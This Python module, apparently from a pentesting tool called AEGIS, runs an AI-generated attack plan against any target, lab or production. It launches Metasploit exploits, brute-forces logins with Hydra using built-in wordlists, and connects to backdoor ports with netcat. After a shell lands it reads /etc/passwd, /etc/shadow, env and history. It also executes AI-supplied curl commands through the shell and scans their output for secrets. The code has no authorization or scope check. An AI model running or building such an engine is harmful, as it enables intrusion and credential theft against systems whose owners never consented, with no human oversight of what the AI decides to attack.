"""
AEGIS core/attack_engine.py
=============================
Executes the attack plan generated by ai_engine.py.

DESIGN PRINCIPLE:
  This engine works for ANY target — localhost Docker lab OR real-world IPs.
  Docker port remapping ONLY applies when target is localhost/127.0.0.1.
  For real targets, ports are used exactly as the AI specifies them.
"""

import subprocess
import json
import os
import re
import time
import hashlib
from datetime import datetime
from django.conf import settings

# Docker port remapping — ONLY used when target is localhost/127.0.0.1
# Maps container-internal ports to Docker-mapped host ports
_DOCKER_PORT_MAP = {
    21:   2121,   # FTP → mapped port
    22:   2222,   # SSH → mapped port
    80:   8083,   # HTTP → mapped port
}

# Localhost identifiers — port mapping only applies to these
_LOCALHOST_TARGETS = {'localhost', '127.0.0.1', '::1', 'host.docker.internal'}


def _is_local_target(target: str) -> bool:
    """Returns True if target is a Docker lab on localhost."""
    return target.strip().lower() in _LOCALHOST_TARGETS


def _resolve_docker_gateway() -> str:
    """Finds the Docker bridge gateway IP for reverse shell callbacks."""
    try:
        result = subprocess.run(
            ["docker", "network", "inspect", "aegis_framework_aegis-net",
             "--format", "{{range .IPAM.Config}}{{.Gateway}}{{end}}"],
            capture_output=True, text=True, timeout=5
        )
        gw = result.stdout.strip()
        if gw:
            return gw
    except Exception:
        pass
    return getattr(settings, 'DOCKER_GATEWAY', '172.19.0.1')


class AttackOrchestrator:
    """
    Receives an AI-generated attack plan and executes each step.
    Logs everything to DB and saves evidence for forensics.
    Works for any target — lab or production.
    """

    def __init__(self, scan_result, attack_plan: dict):
        self.scan_result  = scan_result
        self.attack_plan  = attack_plan
        self.target       = attack_plan.get("target", scan_result.target)
        self.is_local     = _is_local_target(self.target)
        self.results      = []
        self.evidence_dir = f"evidence/{scan_result.id}"
        os.makedirs(self.evidence_dir, exist_ok=True)

    def _map_port(self, port: int) -> int:
        """Remaps port ONLY for localhost Docker targets."""
        if self.is_local:
            return _DOCKER_PORT_MAP.get(port, port)
        return port

    def execute(self) -> dict:
        sequence = self.attack_plan.get("attack_sequence", [])

        if not sequence:
            return {
                "status":  "NO_ATTACKS",
                "message": "AI found no exploitable vulnerabilities",
                "results": []
            }

        sequence = sorted(sequence, key=lambda x: x.get("priority", 99))

        for attack in sequence:
            tool   = attack.get("tool", "manual").lower()
            result = self._execute_single_attack(attack, tool)
            self.results.append(result)

            if result.get("success") and result.get("shell"):
                post = self._post_exploitation(result["shell"])
                result["post_exploitation"] = post

        return {
            "status":      "COMPLETE",
            "target":      self.target,
            "attacks_run": len(self.results),
            "successful":  sum(1 for r in self.results if r.get("success")),
            "results":     self.results,
            "evidence_dir": self.evidence_dir,
            "timestamp":   datetime.now().isoformat()
        }

    def _execute_single_attack(self, attack: dict, tool: str) -> dict:
        from scanner_ui.models import AttackLog

        log = AttackLog.objects.create(
            scan        = self.scan_result,
            tool_used   = tool,
            module      = attack.get("module") or attack.get("command") or "unknown",
            target_port = attack.get("port"),
            status      = "RUNNING"
        )

        try:
            if tool == "metasploit":
                result = self._run_metasploit(attack)
            elif tool == "sqlmap":
                result = self._run_sqlmap(attack)
            elif tool == "hydra":
                result = self._run_hydra(attack)
            elif tool == "nikto":
                result = self._run_nikto(attack)
            elif tool == "zap":
                result = self._run_zap(attack)
            elif tool == "netcat":
                result = self._run_netcat(attack)
            else:
                result = self._manual_instructions(attack)

            log.status     = "SUCCESS" if result.get("success") else "FAILED"
            log.output     = result.get("output", "")[:5000]
            log.session_id = result.get("session_id", "")
            log.save()

            result["vulnerability"] = attack.get("vulnerability", "")
            result["tool"]          = tool
            result["port"]          = attack.get("port")

            self._save_evidence(result, attack)
            return result

        except Exception as e:
            log.status = "ERROR"
            log.output = str(e)
            log.save()
            return {
                "success": False, "tool": tool,
                "error": str(e), "output": f"Attack error: {str(e)}"
            }

    # ─────────────────────────────────────────────────────────────────────────
    # METASPLOIT
    # ─────────────────────────────────────────────────────────────────────────

    def _run_metasploit(self, attack: dict) -> dict:
        module  = attack.get("module", "")
        options = attack.get("options", {})
        payload = attack.get("payload", "")

        # Normalise RHOST → RHOSTS
        if "RHOST" in options and "RHOSTS" not in options:
            options["RHOSTS"] = options.pop("RHOST")

        if "RHOSTS" not in options:
            options["RHOSTS"] = self.target

        # Port mapping — ONLY for localhost Docker lab
        if "RPORT" not in options and attack.get("port"):
            options["RPORT"] = str(self._map_port(attack.get("port")))
        elif "RPORT" in options and self.is_local:
            rport = int(options["RPORT"])
            options["RPORT"] = str(_DOCKER_PORT_MAP.get(rport, rport))

        # For reverse-shell payloads on Docker, set LHOST to gateway
        if payload and "reverse" in payload.lower() and self.is_local:
            if "LHOST" not in options:
                options["LHOST"] = _resolve_docker_gateway()

        try:
            from pymetasploit3.msfrpc import MsfRpcClient

            msf_host = getattr(settings, 'METASPLOIT_HOST', 'localhost')
            msf_port = int(getattr(settings, 'METASPLOIT_PORT', 55553))
            msf_pass = getattr(settings, 'METASPLOIT_PASS', 'aegis123')

            client = MsfRpcClient(msf_pass, server=msf_host, port=msf_port, ssl=False)

            # Verify module exists
            try:
                exploit = client.modules.use('exploit', module)
            except Exception:
                return {
                    "success": False,
                    "output":  f"Module not found: {module}",
                    "module":  module
                }

            # Set options
            for key, value in options.items():
                try:
                    exploit[key] = str(value)
                except Exception:
                    pass

            if payload:
                try:
                    exploit['PAYLOAD'] = payload
                except Exception:
                    pass

            # Execute
            job = exploit.execute(payload=payload if payload else None)
            if not isinstance(job, dict):
                return {
                    "success": False,
                    "output":  (f"Module failed to execute.\n"
                                f"Module: {module}\n"
                                f"Options: {json.dumps(options, indent=2)}"),
                    "module":  module
                }

            job_id = job.get('job_id')

            # Wait for session — 45 seconds
            for _ in range(45):
                time.sleep(1)
                sessions = client.sessions.list
                if sessions:
                    session_id = list(sessions.keys())[-1]
                    session    = client.sessions.session(session_id)
                    session.write("id\n")
                    time.sleep(1)
                    output = session.read()
                    return {
                        "success":    True,
                        "output":     f"Shell obtained!\n{output}",
                        "session_id": str(session_id),
                        "shell":      session,
                        "module":     module
                    }

            return {
                "success": False,
                "output":  (f"Module executed, no session after 45s.\n"
                            f"Job: {job_id} | Module: {module}\n"
                            f"Options: {json.dumps(options, indent=2)}\n"
                            f"Possible causes: target not vulnerable, "
                            f"firewall blocking callback, wrong payload."),
                "module":  module
            }

        except ConnectionRefusedError:
            return {
                "success": False,
                "output":  (f"[METASPLOIT NOT RUNNING]\n"
                            f"Start: msfconsole -q -x \"load msgrpc "
                            f"Pass=aegis123 ServerPort=55553 SSL=false\"\n"
                            f"Module: {module}"),
                "module":  module
            }
        except Exception as e:
            return {
                "success": False,
                "output":  f"Metasploit error: {str(e)}\nModule: {module}",
                "module":  module
            }

    # ─────────────────────────────────────────────────────────────────────────
    # SQLMAP
    # ─────────────────────────────────────────────────────────────────────────

    def _run_sqlmap(self, attack: dict) -> dict:
        port    = attack.get("port", 80)
        options = attack.get("options", {})
        scheme  = "https" if port == 443 else "http"

        url = (options.get("url")
               or options.get("target_url")
               or f"{scheme}://{self.target}:{port}/")

        output_dir = f"{self.evidence_dir}/sqlmap"
        os.makedirs(output_dir, exist_ok=True)
        cookie = options.get("cookie", "")

        try:
            cmd = [
                "sqlmap", "-u", url,
                "--batch", "--level", "3", "--risk", "2",
                "--dbs", "--output-dir", output_dir,
                "--timeout", "30", "--forms",
                "--crawl", "3", "--random-agent",
            ]
            if cookie:
                cmd += ["--cookie", cookie]

            result = subprocess.run(cmd, capture_output=True, text=True, timeout=240)
            output = result.stdout + result.stderr
            success = ("injectable" in output.lower()
                       or "sqlmap identified" in output.lower()
                       or ("parameter" in output.lower()
                           and "is vulnerable" in output.lower()))

            return {"success": success, "output": output[:3000],
                    "url": url, "tool": "sqlmap"}

        except FileNotFoundError:
            return {"success": False, "output": "[ERROR] sqlmap not installed"}
        except subprocess.TimeoutExpired:
            return {"success": False, "output": "[TIMEOUT] SQLMap exceeded 4 minutes"}
        except Exception as e:
            return {"success": False, "output": f"SQLMap error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # HYDRA
    # ─────────────────────────────────────────────────────────────────────────

    def _run_hydra(self, attack: dict) -> dict:
        port    = attack.get("port", 22)
        service = attack.get("service", "ssh").lower()
        options = attack.get("options", {})

        userlist = "/usr/share/wordlists/metasploit/unix_users.txt"
        passlist = "/usr/share/wordlists/metasploit/unix_passwords.txt"

        if not os.path.exists(userlist):
            userlist = f"{self.evidence_dir}/users.txt"
            with open(userlist, "w") as f:
                f.write("admin\nroot\nuser\ntest\nguest\nwww-data\n"
                        "ftp\nmsfadmin\npostgres\nmysql\nservice\n"
                        "tomcat\napache\nnobody\noperator\n")

        if not os.path.exists(passlist):
            passlist = f"{self.evidence_dir}/passwords.txt"
            with open(passlist, "w") as f:
                f.write("admin\npassword\n123456\nroot\ntoor\n"
                        "password123\nadmin123\nmsfadmin\npostgres\n"
                        "mysql\nuser\ntest\nguest\nftp\nletmein\n"
                        "master\nchangeme\n1234\ndefault\nservice\n"
                        "tomcat\napache\npasswd\nqwerty\n")

        try:
            protocol_map = {
                "ssh": "ssh", "ftp": "ftp",
                "http": "http-get", "https": "https-get",
                "smtp": "smtp", "mysql": "mysql",
                "postgres": "postgres", "postgresql": "postgres",
                "mssql": "mssql", "rdp": "rdp", "vnc": "vnc",
                "telnet": "telnet", "smb": "smb",
            }
            protocol = protocol_map.get(service, service)

            cmd = [
                "hydra",
                "-L", userlist, "-P", passlist,
                "-t", "4", "-f", "-V",
                self.target, protocol,
                "-s", str(port),
            ]

            result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
            output  = result.stdout + result.stderr
            success = "login:" in output.lower() and "password:" in output.lower()
            creds   = [l.strip() for l in output.splitlines()
                       if "login:" in l.lower() and "password:" in l.lower()]

            return {
                "success": success, "output": output[:3000],
                "credentials": creds, "service": service, "port": port
            }

        except FileNotFoundError:
            return {"success": False, "output": "[ERROR] hydra not installed"}
        except subprocess.TimeoutExpired:
            return {"success": False, "output": "[TIMEOUT] Hydra exceeded 5 minutes"}
        except Exception as e:
            return {"success": False, "output": f"Hydra error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # NIKTO
    # ─────────────────────────────────────────────────────────────────────────

    def _run_nikto(self, attack: dict) -> dict:
        port        = attack.get("port", 80)
        scheme      = "https" if port == 443 else "http"
        url         = f"{scheme}://{self.target}:{port}"
        output_file = f"{self.evidence_dir}/nikto_{port}.txt"

        try:
            cmd = [
                "nikto", "-h", url,
                "-o", output_file, "-Format", "txt",
                "-timeout", "10", "-maxtime", "300s",
            ]
            result  = subprocess.run(cmd, capture_output=True, text=True, timeout=330)
            output  = result.stdout + result.stderr
            finding_count = output.lower().count("osvdb") + output.count("+ ")
            success = finding_count > 3

            return {
                "success": success, "output": output[:3000],
                "output_file": output_file, "url": url,
                "findings_count": finding_count
            }

        except FileNotFoundError:
            return {"success": False, "output": "[ERROR] nikto not installed"}
        except subprocess.TimeoutExpired:
            return {"success": False, "output": "[TIMEOUT] Nikto exceeded 5 minutes"}
        except Exception as e:
            return {"success": False, "output": f"Nikto error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # ZAP
    # ─────────────────────────────────────────────────────────────────────────

    def _run_zap(self, attack: dict) -> dict:
        import requests as req

        port   = attack.get("port", 80)
        scheme = "https" if port == 443 else "http"
        url    = f"{scheme}://{self.target}:{port}"
        ZAP_API = "http://localhost:8090"
        ZAP_KEY = "aegis_zap_key"

        try:
            # Spider first
            try:
                req.get(f"{ZAP_API}/JSON/spider/action/scan/",
                        params={"url": url, "apikey": ZAP_KEY}, timeout=10)
                time.sleep(10)
            except Exception:
                pass

            resp    = req.get(f"{ZAP_API}/JSON/ascan/action/scan/",
                              params={"url": url, "apikey": ZAP_KEY}, timeout=10)
            scan_id = resp.json().get("scan")

            for _ in range(100):
                time.sleep(3)
                status = req.get(
                    f"{ZAP_API}/JSON/ascan/view/status/",
                    params={"scanId": scan_id, "apikey": ZAP_KEY}, timeout=5
                ).json().get("status", "0")
                if status == "100":
                    break

            alerts = req.get(
                f"{ZAP_API}/JSON/alert/view/alerts/",
                params={"baseurl": url, "apikey": ZAP_KEY}, timeout=10
            ).json().get("alerts", [])

            high    = [a for a in alerts if a.get("risk") in ["High", "Critical"]]
            medium  = [a for a in alerts if a.get("risk") == "Medium"]
            output  = "\n".join(
                f"[{a.get('risk')}] {a.get('alert')} — {a.get('url')}"
                for a in alerts[:20]
            )
            success = len(high) > 0 or len(medium) >= 3

            return {"success": success, "output": output or "No alerts",
                    "alerts": len(alerts), "high": len(high), "medium": len(medium)}

        except req.exceptions.ConnectionError:
            return {"success": False, "output": "[ZAP NOT RUNNING] localhost:8090"}
        except Exception as e:
            return {"success": False, "output": f"ZAP error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # NETCAT — connects to open backdoor/bindshell ports
    # ─────────────────────────────────────────────────────────────────────────

    def _run_netcat(self, attack: dict) -> dict:
        """
        Connects to open backdoor ports using netcat.
        Used for ingreslock (1524), pre-opened bindshells, etc.
        This is a legitimate pentest technique — real attackers use nc.
        """
        port    = attack.get("port", 1524)
        timeout = attack.get("options", {}).get("timeout", 10)

        try:
            proc = subprocess.Popen(
                ["nc", "-w", str(timeout), self.target, str(port)],
                stdin=subprocess.PIPE,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE
            )

            # Send identification commands
            commands = "id\nwhoami\nuname -a\ncat /etc/passwd\nexit\n"
            stdout, stderr = proc.communicate(
                input=commands.encode(), timeout=15
            )
            output = stdout.decode(errors='ignore')

            success = ("uid=" in output or "root" in output
                       or "/bin/bash" in output)

            return {
                "success": success,
                "output":  f"[NETCAT SHELL]\n{output[:3000]}",
                "tool":    "netcat",
                "port":    port
            }

        except subprocess.TimeoutExpired:
            proc.kill()
            return {"success": False, "output": "[TIMEOUT] nc connection timed out"}
        except FileNotFoundError:
            return {"success": False, "output": "[ERROR] netcat not installed"}
        except Exception as e:
            return {"success": False, "output": f"Netcat error: {str(e)}"}




    # ─────────────────────────────────────────────────────────────────────────
    # MANUAL — safe curl, splits compound commands
    # ─────────────────────────────────────────────────────────────────────────

    def _manual_instructions(self, attack: dict) -> dict:
        command = attack.get("command", "")

        if command and ("curl " in command or command.strip().startswith("curl")):
            os.makedirs(self.evidence_dir, exist_ok=True)
            sub_commands = [c.strip() for c in command.split("&&")]
            all_outputs  = []
            any_success  = False

            for idx, sub_cmd in enumerate(sub_commands):
                if not sub_cmd.startswith("curl"):
                    continue

                safe_path = (f"{self.evidence_dir}/"
                             f"curl_output_{attack.get('port', 0)}_{idx}.txt")
                safe_cmd = re.sub(r'-o\s+\S+', f'-o {safe_path}', sub_cmd)
                if ' -o ' not in safe_cmd and ' -O' not in safe_cmd:
                    safe_cmd = sub_cmd + f' -o {safe_path}'

                try:
                    result = subprocess.run(
                        safe_cmd, shell=True,
                        capture_output=True, text=True, timeout=30
                    )
                    output = ""
                    if os.path.exists(safe_path):
                        with open(safe_path, 'r', errors='ignore') as f:
                            output = f.read(2000)
                    if not output:
                        output = result.stdout[:2000] or result.stderr[:500]

                    sensitive = [
                        'api_key', 'password', 'passwd', 'secret', 'token',
                        'database', 'db_pass', 'db_user', 'aws_',
                        'private_key', 'access_key', 'smtp_',
                        'key=', 'pass=', 'secret=', 'token=',
                        'mysql', 'postgres', 'mongo', 'redis',
                        'begin rsa', 'begin private', 'ssh-rsa',
                    ]
                    if (result.returncode == 0 and len(output) > 50
                            and any(kw in output.lower() for kw in sensitive)):
                        any_success = True

                    all_outputs.append(
                        f"--- curl #{idx+1}: {sub_cmd[:80]} ---\n"
                        f"{output[:500]}\n")
                except subprocess.TimeoutExpired:
                    all_outputs.append(f"--- curl #{idx+1}: TIMEOUT ---\n")
                except Exception as e:
                    all_outputs.append(f"--- curl #{idx+1}: ERROR: {e} ---\n")

            if all_outputs:
                return {
                    "success": any_success,
                    "output":  "[EXECUTED]\n" + "\n".join(all_outputs),
                    "tool": "manual", "command": command,
                    "evidence_dir": self.evidence_dir
                }

        return {
            "success": None,
            "output": (
                f"[MANUAL TESTING REQUIRED]\n\n"
                f"Vulnerability: {attack.get('vulnerability', 'Unknown')}\n"
                f"Port: {attack.get('port', 'N/A')}\n\n"
                f"Command:\n{command}\n\n"
                f"Expected: {attack.get('expected_outcome', 'Unknown')}\n"
                f"Fallback: {attack.get('fallback', 'N/A')}"
            ),
            "tool": "manual"
        }

    # ─────────────────────────────────────────────────────────────────────────
    # POST-EXPLOITATION
    # ─────────────────────────────────────────────────────────────────────────

    def _post_exploitation(self, session) -> list:
        commands = [
            "id", "whoami", "uname -a",
            "cat /etc/passwd",
            "cat /etc/shadow 2>/dev/null || echo 'Permission denied'",
            "sudo -l",
            "find / -perm -4000 2>/dev/null | head -20",
            "ifconfig 2>/dev/null || ip a",
            "netstat -tulpn 2>/dev/null || ss -tulpn",
            "ps aux | head -30", "env",
            "cat /etc/crontab 2>/dev/null",
            "ls -la /home/",
            "history 2>/dev/null | tail -20",
        ]
        results = []
        try:
            for cmd in commands:
                session.write(cmd + "\n")
                time.sleep(0.5)
                output = session.read()
                results.append({"command": cmd, "output": output})
                self._append_evidence("post_exploitation.txt",
                                      f"$ {cmd}\n{output}\n\n")
        except Exception as e:
            results.append({"command": "error", "output": str(e)})
        return results

    # ─────────────────────────────────────────────────────────────────────────
    # EVIDENCE
    # ─────────────────────────────────────────────────────────────────────────

    def _save_evidence(self, result: dict, attack: dict):
        from scanner_ui.models import ForensicEvidence
        safe_result = {k: v for k, v in result.items() if k != "shell"}

        content = json.dumps({
            "timestamp":     datetime.now().isoformat(),
            "target":        self.target,
            "vulnerability": attack.get("vulnerability", ""),
            "tool":          attack.get("tool", ""),
            "module":        attack.get("module", ""),
            "port":          attack.get("port"),
            "cvss":          attack.get("cvss"),
            "confidence":    attack.get("confidence"),
            "result":        safe_result
        }, indent=2)

        filename = (f"{self.evidence_dir}/attack_"
                    f"{attack.get('tool','unknown')}_{attack.get('port',0)}.json")
        with open(filename, "w") as f:
            f.write(content)

        sha256 = hashlib.sha256(content.encode()).hexdigest()
        ForensicEvidence.objects.create(
            scan=self.scan_result, evidence_type="LOG",
            file_path=filename, sha256_hash=sha256,
            description=(
                f"{attack.get('tool','')} port {attack.get('port','')} — "
                f"{'SUCCESS' if result.get('success') else 'FAILED'} — "
                f"{attack.get('vulnerability','')[:60]}"
            )
        )

    def _append_evidence(self, filename: str, content: str):
        with open(f"{self.evidence_dir}/{filename}", "a") as f:
            f.write(content)


# ─────────────────────────────────────────────────────────────────────────────
# PIPELINE HELPER
# ─────────────────────────────────────────────────────────────────────────────

def run_attack_pipeline(scan_result_id: int) -> dict:
    from scanner_ui.models import ScanResult
    from core.ai_engine import generate_attack_plan

    try:
        scan         = ScanResult.objects.get(id=scan_result_id)
        attack_plan  = generate_attack_plan(scan.raw_data, scan.target)
        orchestrator = AttackOrchestrator(scan, attack_plan)
        results      = orchestrator.execute()

        raw_data                   = dict(scan.raw_data)
        raw_data["attack_plan"]    = attack_plan
        raw_data["attack_results"] = results
        scan.raw_data              = raw_data
        scan.save()

        return {"status": "COMPLETE", "scan_id": scan_result_id,
                "attack_plan": attack_plan, "results": results}

    except ScanResult.DoesNotExist:
        return {"status": "ERROR", "message": f"Scan {scan_result_id} not found"}
    except Exception as e:
        return {"status": "ERROR", "message": str(e)}